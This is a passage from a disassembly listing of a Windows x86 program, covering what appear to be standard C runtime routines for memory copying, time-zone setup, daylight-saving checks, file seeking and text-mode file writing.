jz short loc_406F13
mov eax, [ebp+var_4]
mov [edx], eax
loc_406F13: ; CODE XREF: sub_406D2E+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_406F21
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_406F21: ; CODE XREF: sub_406D2E+1E9�j
mov eax, [ebp+var_8]
jmp short loc_406F31
; ---------------------------------------------------------------------------
loc_406F26: ; CODE XREF: sub_406D2E+66�j
; sub_406D2E+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_406F2F
mov [eax], edi
loc_406F2F: ; CODE XREF: sub_406D2E+1FD�j
xor eax, eax
loc_406F31: ; CODE XREF: sub_406D2E+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_406D2E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406F40 proc near ; CODE XREF: sub_40459F+2EF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_406F60
cmp edi, eax
jb loc_4070D8
loc_406F60: ; CODE XREF: sub_406F40+16�j
test edi, 3
jnz short loc_406F7C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_406F9C
rep movsd
jmp off_407088[edx*4]
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_406F40+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_406F94
and eax, 3
add ecx, eax
jmp dword ptr loc_406F9C+4[eax*4]
; ---------------------------------------------------------------------------
loc_406F94: ; CODE XREF: sub_406F40+46�j
jmp dword ptr loc_407098[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_406F9C: ; CODE XREF: sub_406F40+31�j
; sub_406F40+8E�j ...
jmp off_40701C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_406FB0
dd offset loc_406FDC
dd offset loc_407000
; ---------------------------------------------------------------------------
loc_406FB0: ; DATA XREF: sub_406F40+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_406F9C
rep movsd
jmp off_407088[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_406FDC: ; DATA XREF: sub_406F40+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_406F9C
rep movsd
jmp off_407088[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_407000: ; DATA XREF: sub_406F40+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_406F9C
rep movsd
jmp off_407088[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40701C dd offset loc_40707F ; DATA XREF: sub_406F40:loc_406F9C�r
dd offset loc_40706C
dd offset loc_407064
dd offset loc_40705C
dd offset loc_407054
dd offset loc_40704C
dd offset loc_407044
dd offset loc_40703C
; ---------------------------------------------------------------------------
loc_40703C: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407044: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40704C: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407054: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40705C: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407064: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40706C: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40707F: ; CODE XREF: sub_406F40:loc_406F9C�j
; DATA XREF: sub_406F40:off_40701C�o
jmp off_407088[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407088 dd offset loc_407098 ; DATA XREF: sub_406F40+35�r
; sub_406F40+92�r ...
dd offset loc_4070A0
dd offset loc_4070AC
dd offset loc_4070C0
; ---------------------------------------------------------------------------
loc_407098: ; CODE XREF: sub_406F40+35�j
; sub_406F40+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4070A0: ; CODE XREF: sub_406F40+35�j
; sub_406F40+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4070AC: ; CODE XREF: sub_406F40+35�j
; sub_406F40+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4070C0: ; CODE XREF: sub_406F40+35�j
; sub_406F40+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4070D8: ; CODE XREF: sub_406F40+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40710C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407100
std
rep movsd
cld
jmp off_407220[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_407100: ; CODE XREF: sub_406F40+1B1�j
; sub_406F40+208�j ...
neg ecx
jmp off_4071D0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40710C: ; CODE XREF: sub_406F40+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407124
and eax, 3
sub ecx, eax
jmp dword ptr loc_407124+4[eax*4]
; ---------------------------------------------------------------------------
loc_407124: ; CODE XREF: sub_406F40+1D6�j
; DATA XREF: sub_406F40+1DD�r
jmp off_407220[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407138
dd offset loc_407158
; ---------------------------------------------------------------------------
xor byte ptr [ecx+40h], 0
loc_407138: ; DATA XREF: sub_406F40+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_407100
std
rep movsd
cld
jmp off_407220[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407158: ; DATA XREF: sub_406F40+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_407100
std
rep movsd
cld
jmp off_407220[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_407100
std
rep movsd
cld
jmp off_407220[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4071D4
dd offset loc_4071DC
dd offset loc_4071E4
dd offset loc_4071EC
dd offset loc_4071F4
dd offset loc_4071FC
dd offset loc_407204
off_4071D0 dd offset loc_407217 ; DATA XREF: sub_406F40+1C2�r
; ---------------------------------------------------------------------------
loc_4071D4: ; DATA XREF: sub_406F40+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4071DC: ; DATA XREF: sub_406F40+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4071E4: ; DATA XREF: sub_406F40+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4071EC: ; DATA XREF: sub_406F40+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4071F4: ; DATA XREF: sub_406F40+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4071FC: ; DATA XREF: sub_406F40+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407204: ; DATA XREF: sub_406F40+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407217: ; CODE XREF: sub_406F40+1C2�j
; DATA XREF: sub_406F40:off_4071D0�o
jmp off_407220[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407220 dd offset loc_407230 ; DATA XREF: sub_406F40+1B7�r
; sub_406F40:loc_407124�r ...
dd offset loc_407238
dd offset loc_407248
dd offset loc_40725C
; ---------------------------------------------------------------------------
loc_407230: ; CODE XREF: sub_406F40+1B7�j
; sub_406F40:loc_407124�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407238: ; CODE XREF: sub_406F40+1B7�j
; sub_406F40:loc_407124�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407248: ; CODE XREF: sub_406F40+1B7�j
; sub_406F40:loc_407124�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40725C: ; CODE XREF: sub_406F40+1B7�j
; sub_406F40:loc_407124�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_406F40 endp
; =============== S U B R O U T I N E =======================================
sub_407275 proc near ; CODE XREF: sub_405740:loc_40577F�p
cmp dword_40E660, 0
jnz short locret_407289
call sub_40728A
inc dword_40E660
locret_407289: ; CODE XREF: sub_407275+7�j
retn
sub_407275 endp
; =============== S U B R O U T I N E =======================================
sub_40728A proc near ; CODE XREF: sub_407275+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov dword_40E5A8, ebp
mov dword_40DE68, ebx
mov dword_40DE58, ebx
call sub_4086AA
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_4073B3
push offset dword_40E5B0
call dword_40A118 ; GetTimeZoneInformation
cmp eax, ebx
jz loc_4074E2
mov eax, dword_40E5B0
mov ecx, dword_40E604
imul eax, 3Ch
cmp word_40E5F6, bp
push 1
pop edx
mov dword_40DDC0, eax
mov dword_40E5A8, edx
jz short loc_407301
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_40DDC0, eax
loc_407301: ; CODE XREF: sub_40728A+69�j
cmp word_40E64A, bp
jz short loc_407325
mov eax, dword_40E658
cmp eax, ebp
jz short loc_407325
sub eax, ecx
mov dword_40DDC4, edx
imul eax, 3Ch
mov dword_40DDC8, eax
jmp short loc_407331
; ---------------------------------------------------------------------------
loc_407325: ; CODE XREF: sub_40728A+7E�j
; sub_40728A+87�j
mov dword_40DDC4, ebp
mov dword_40DDC8, ebp
loc_407331: ; CODE XREF: sub_40728A+99�j
lea eax, [esp+14h+var_4]
mov esi, dword_40A0B4
push eax
push ebp
push 3Fh
mov edi, 220h
push off_40DE4C
push ebx
push offset dword_40E5B4
push edi
push dword_40E490
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_40736E
cmp [esp+14h+var_4], ebp
jnz short loc_40736E
mov eax, off_40DE4C
and byte ptr [eax+3Fh], 0
jmp short loc_407376
; ---------------------------------------------------------------------------
loc_40736E: ; CODE XREF: sub_40728A+D1�j
; sub_40728A+D7�j
mov eax, off_40DE4C
and byte ptr [eax], 0
loc_407376: ; CODE XREF: sub_40728A+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_40DE50
push ebx
push offset dword_40E608
push edi
push dword_40E490
call esi ; WideCharToMultiByte
test eax, eax
jz loc_4074DA
cmp [esp+14h+var_4], ebp
jnz loc_4074DA
mov eax, off_40DE50
and byte ptr [eax+3Fh], 0
jmp loc_4074E2
; ---------------------------------------------------------------------------
loc_4073B3: ; CODE XREF: sub_40728A+2D�j
cmp byte ptr [esi], 0
jz loc_4074E2
mov eax, dword_40E65C
cmp eax, ebp
jz short loc_4073D6
push eax
push esi
call sub_403850
pop ecx
test eax, eax
pop ecx
jz loc_4074E2
loc_4073D6: ; CODE XREF: sub_40728A+139�j
push dword_40E65C
call sub_403B18
push esi
call sub_403B90
inc eax
push eax
call sub_40345E
add esp, 0Ch
cmp eax, ebp
mov dword_40E65C, eax
jz loc_4074E2
push esi
push eax
call sub_403CB0
push 3
push esi
push off_40DE4C
call sub_4084E0
mov eax, off_40DE4C
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_40742B
push 1
inc esi
pop edi
loc_40742B: ; CODE XREF: sub_40728A+19B�j
push esi
call sub_403DA0
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_40DDC0, ecx
loc_407442: ; CODE XREF: sub_40728A+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_407450
cmp al, bl
jl short loc_407453
cmp al, 39h
jg short loc_407453
loc_407450: ; CODE XREF: sub_40728A+1BC�j
inc esi
jmp short loc_407442
; ---------------------------------------------------------------------------
loc_407453: ; CODE XREF: sub_40728A+1C0�j
; sub_40728A+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_4074A6
inc esi
push esi
call sub_403DA0
imul eax, 3Ch
pop ecx
mov ecx, dword_40DDC0
add ecx, eax
mov dword_40DDC0, ecx
loc_407471: ; CODE XREF: sub_40728A+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_40747E
cmp al, 39h
jg short loc_40747E
inc esi
jmp short loc_407471
; ---------------------------------------------------------------------------
loc_40747E: ; CODE XREF: sub_40728A+1EB�j
; sub_40728A+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_4074A6
inc esi
push esi
call sub_403DA0
pop ecx
mov ecx, dword_40DDC0
add ecx, eax
mov dword_40DDC0, ecx
loc_407499: ; CODE XREF: sub_40728A+21A�j
mov al, [esi]
cmp al, bl
jl short loc_4074A6
cmp al, 39h
jg short loc_4074A6
inc esi
jmp short loc_407499
; ---------------------------------------------------------------------------
loc_4074A6: ; CODE XREF: sub_40728A+1CC�j
; sub_40728A+1F7�j ...
cmp edi, ebp
jz short loc_4074B2
neg ecx
mov dword_40DDC0, ecx
loc_4074B2: ; CODE XREF: sub_40728A+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_40DDC4, eax
jz short loc_4074DA
push 3
push esi
push off_40DE50
call sub_4084E0
mov eax, off_40DE50
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_4074E2
; ---------------------------------------------------------------------------
loc_4074DA: ; CODE XREF: sub_40728A+10B�j
; sub_40728A+115�j ...
mov eax, off_40DE50
and byte ptr [eax], 0
loc_4074E2: ; CODE XREF: sub_40728A+40�j
; sub_40728A+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_40728A endp
; =============== S U B R O U T I N E =======================================
sub_4074E8 proc near ; CODE XREF: sub_405740+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_40DDC4, edi
jnz short loc_4074FC
loc_4074F5: ; CODE XREF: sub_4074E8+148�j
; sub_4074E8+150�j ...
xor eax, eax
jmp loc_407648
; ---------------------------------------------------------------------------
loc_4074FC: ; CODE XREF: sub_4074E8+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_40DE58
jnz short loc_40751A
cmp eax, dword_40DE68
jz loc_40761C
loc_40751A: ; CODE XREF: sub_4074E8+24�j
cmp dword_40E5A8, edi
jz loc_4075F2
movzx ecx, word_40E656
push ecx
cmp word_40E648, di
movzx ecx, word_40E654
push ecx
movzx ecx, word_40E652
push ecx
movzx ecx, word_40E650
push ecx
jnz short loc_40756C
movzx ecx, word_40E64C
push edi
push ecx
movzx ecx, word_40E64E
push ecx
movzx ecx, word_40E64A
push ecx
push eax
push ebx
jmp short loc_407580
; ---------------------------------------------------------------------------
loc_40756C: ; CODE XREF: sub_4074E8+65�j
movzx ecx, word_40E64E
push ecx
push edi
movzx ecx, word_40E64A
push edi
push ecx
push eax
push edi
loc_407580: ; CODE XREF: sub_4074E8+82�j
push ebx
call sub_407694
movzx eax, word_40E602
add esp, 2Ch
cmp word_40E5F4, di
push eax
movzx eax, word_40E600
push eax
movzx eax, word_40E5FE
push eax
movzx eax, word_40E5FC
push eax
jnz short loc_4075DA
movzx eax, word_40E5F8
push edi
push eax
movzx eax, word_40E5FA
push eax
movzx eax, word_40E5F6
push eax
push dword ptr [esi+14h]
push ebx
loc_4075CF: ; CODE XREF: sub_4074E8+108�j
push edi
call sub_407694
add esp, 2Ch
jmp short loc_40761C
; ---------------------------------------------------------------------------
loc_4075DA: ; CODE XREF: sub_4074E8+C8�j
movzx eax, word_40E5FA
push eax
push edi
movzx eax, word_40E5F6
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_4075CF
; ---------------------------------------------------------------------------
loc_4075F2: ; CODE XREF: sub_4074E8+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_407694
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_407694
add esp, 58h
loc_40761C: ; CODE XREF: sub_4074E8+2C�j
; sub_4074E8+F0�j
mov edx, dword_40DE5C
mov eax, dword_40DE6C
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_40764C
cmp ecx, edx
jl loc_4074F5
cmp ecx, eax
jg loc_4074F5
cmp ecx, edx
jle short loc_407660
cmp ecx, eax
jge short loc_407660
loc_407646: ; CODE XREF: sub_4074E8+166�j
; sub_4074E8+16A�j
mov eax, ebx
loc_407648: ; CODE XREF: sub_4074E8+F�j
; sub_4074E8+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40764C: ; CODE XREF: sub_4074E8+144�j
cmp ecx, eax
jl short loc_407646
cmp ecx, edx
jg short loc_407646
cmp ecx, eax
jle short loc_407660
cmp ecx, edx
jl loc_4074F5
loc_407660: ; CODE XREF: sub_4074E8+158�j
; sub_4074E8+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_407687
xor ecx, ecx
cmp eax, dword_40DE60
setnl cl
loc_407683: ; CODE XREF: sub_4074E8+1AA�j
mov eax, ecx
jmp short loc_407648
; ---------------------------------------------------------------------------
loc_407687: ; CODE XREF: sub_4074E8+18E�j
xor ecx, ecx
cmp eax, dword_40DE70
setl cl
jmp short loc_407683
sub_4074E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407694 proc near ; CODE XREF: sub_4074E8+99�p
; sub_4074E8+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_40772F
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_4076BF
shl esi, 2
mov eax, dword_40DE70[esi]
jmp short loc_4076C8
; ---------------------------------------------------------------------------
loc_4076BF: ; CODE XREF: sub_407694+1E�j
shl esi, 2
mov eax, dword_40DEA4[esi]
loc_4076C8: ; CODE XREF: sub_407694+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_407702
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_40770C
; ---------------------------------------------------------------------------
loc_407702: ; CODE XREF: sub_407694+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_40770C: ; CODE XREF: sub_407694+6C�j
cmp [ebp+arg_10], 5
jnz short loc_40774A
cmp [ebp+arg_8], 0
jnz short loc_407720
mov esi, dword_40DE74[esi]
jmp short loc_407726
; ---------------------------------------------------------------------------
loc_407720: ; CODE XREF: sub_407694+82�j
mov esi, dword_40DEA8[esi]
loc_407726: ; CODE XREF: sub_407694+8A�j
cmp ecx, esi
jle short loc_40774A
sub ecx, 7
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_40772F: ; CODE XREF: sub_407694+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_407740
mov ecx, dword_40DE70[eax*4]
jmp short loc_407747
; ---------------------------------------------------------------------------
loc_407740: ; CODE XREF: sub_407694+A1�j
mov ecx, dword_40DEA4[eax*4]
loc_407747: ; CODE XREF: sub_407694+AA�j
add ecx, [ebp+arg_18]
loc_40774A: ; CODE XREF: sub_407694+7C�j
; sub_407694+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_40777B
mov eax, [ebp+arg_1C]
mov dword_40DE5C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_40DE58, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_40DE60, eax
jmp short loc_4077D0
; ---------------------------------------------------------------------------
loc_40777B: ; CODE XREF: sub_407694+BA�j
mov eax, [ebp+arg_1C]
mov dword_40DE6C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_40DDC8
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_40DE70, eax
jns short loc_4077B3
add eax, 5265C00h
dec ecx
mov dword_40DE70, eax
jmp short loc_4077C4
; ---------------------------------------------------------------------------
loc_4077B3: ; CODE XREF: sub_407694+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_4077CA
sub eax, edx
inc ecx
mov dword_40DE70, eax
loc_4077C4: ; CODE XREF: sub_407694+11D�j
mov dword_40DE6C, ecx
loc_4077CA: ; CODE XREF: sub_407694+126�j
mov dword_40DE68, ebx
loc_4077D0: ; CODE XREF: sub_407694+E5�j
pop esi
pop ebx
pop ebp
retn
sub_407694 endp
; =============== S U B R O U T I N E =======================================
sub_4077D4 proc near ; CODE XREF: sub_405802+CD�p
; sub_40786E+59�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_410620
push esi
push edi
jnb short loc_407856
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:410520h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_407856
push eax
call sub_408808
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_407818
mov dword_40E3F8, 9
jmp short loc_407867
; ---------------------------------------------------------------------------
loc_407818: ; CODE XREF: sub_4077D4+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword_40A098 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_407838
call dword_40A0F4 ; RtlGetLastWin32Error
jmp short loc_40783A
; ---------------------------------------------------------------------------
loc_407838: ; CODE XREF: sub_4077D4+5A�j
xor eax, eax
loc_40783A: ; CODE XREF: sub_4077D4+62�j
test eax, eax
jz short loc_407847
push eax
call sub_408727
pop ecx
jmp short loc_407867
; ---------------------------------------------------------------------------
loc_407847: ; CODE XREF: sub_4077D4+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_40786A
; ---------------------------------------------------------------------------
loc_407856: ; CODE XREF: sub_4077D4+D�j
; sub_4077D4+2A�j
and dword_40E3FC, 0
mov dword_40E3F8, 9
loc_407867: ; CODE XREF: sub_4077D4+42�j
; sub_4077D4+71�j
or eax, 0FFFFFFFFh
loc_40786A: ; CODE XREF: sub_4077D4+80�j
pop edi
pop esi
pop ebx
retn
sub_4077D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40786E proc near ; CODE XREF: sub_405802+95�p
; sub_405802+E8�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_410620
push esi
push edi
jnb loc_407A02
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:410520h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_407A02
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_4078BF
loc_4078B8: ; CODE XREF: sub_40786E+177�j
xor eax, eax
jmp loc_407A16
; ---------------------------------------------------------------------------
loc_4078BF: ; CODE XREF: sub_40786E+48�j
test al, 20h
jz short loc_4078CF
push 2
push edi
push ecx
call sub_4077D4
add esp, 0Ch
loc_4078CF: ; CODE XREF: sub_40786E+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_40799E
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_4079D6
loc_4078EF: ; CODE XREF: sub_40786E+F5�j
lea eax, [ebp+var_414]
loc_4078F5: ; CODE XREF: sub_40786E+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_407929
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_407914
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_407914: ; CODE XREF: sub_40786E+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_4078F5
loc_407929: ; CODE XREF: sub_40786E+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_40A09C ; WriteFile
test eax, eax
jz short loc_407993
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_407965
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_4078EF
loc_407965: ; CODE XREF: sub_40786E+EA�j
; sub_40786E+12E�j
xor edi, edi
loc_407967: ; CODE XREF: sub_40786E+150�j
; sub_40786E+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_4079FD
cmp [ebp+arg_0], edi
jz short loc_4079D6
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_4079CB
mov dword_40E3F8, 9
mov dword_40E3FC, eax
jmp loc_407A13
; ---------------------------------------------------------------------------
loc_407993: ; CODE XREF: sub_40786E+E0�j
call dword_40A0F4 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_407965
; ---------------------------------------------------------------------------
loc_40799E: ; CODE XREF: sub_40786E+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_40A09C ; WriteFile
test eax, eax
jz short loc_4079C0
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_407967
; ---------------------------------------------------------------------------
loc_4079C0: ; CODE XREF: sub_40786E+145�j
call dword_40A0F4 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_407967
; ---------------------------------------------------------------------------
loc_4079CB: ; CODE XREF: sub_40786E+10F�j
push [ebp+arg_0]
call sub_408727
pop ecx
jmp short loc_407A13
; ---------------------------------------------------------------------------
loc_4079D6: ; CODE XREF: sub_40786E+7B�j
; sub_40786E+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
